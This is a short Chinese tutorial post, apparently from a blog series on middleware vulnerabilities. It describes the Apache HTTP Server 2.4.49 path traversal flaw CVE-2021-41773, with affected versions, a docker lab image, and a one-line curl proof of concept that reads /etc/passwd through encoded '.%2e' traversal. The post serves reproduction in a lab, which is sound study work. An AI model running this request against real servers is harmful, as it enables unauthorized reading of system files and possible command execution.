常见中间件漏洞(四、Apache合集)

目录

四、Apache

[4.1 CVE-2021-41773](#4.1 CVE-2021-41773)

漏洞简介

影响版本

环境搭建

漏洞复现


四、Apache

4.1 CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件,在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)。

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建
复制代码
docker pull blueteamsteve/cve-2021-41773:no-cgid
漏洞复现

1.使用poc

复制代码
curl http://IP:PORT/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
相关推荐
cat&seven10 小时前
CISSP通过回顾
网络安全·cissp
hjh1982912 小时前
渗透前四天总结
网络·网络安全
ZLJ05072413 小时前
网络安全的基本练习
安全·网络安全
桑晒.13 小时前
Webshell连接工具原理
安全·web安全·网络安全
小红卒1 天前
sqli-labs靶场通关笔记:第1-4关 联合注入
网络安全·sql注入漏洞
捉鸭子1 天前
转转APP逆向
爬虫·python·网络安全·网络爬虫
Fantasy丶夜雨笙歌1 天前
Apache HTTP Server 从安装到配置
网络协议·http·apache
半梦半醒*1 天前
OSPF实验一
运维·网络·网络协议·tcp/ip·网络安全·信息与通信
蠢货爱好者1 天前
一分钟快速了解Apache
apache
麟城Lincoln1 天前
【Linux-云原生-笔记】Apache相关
linux·笔记·云原生·apache·webserver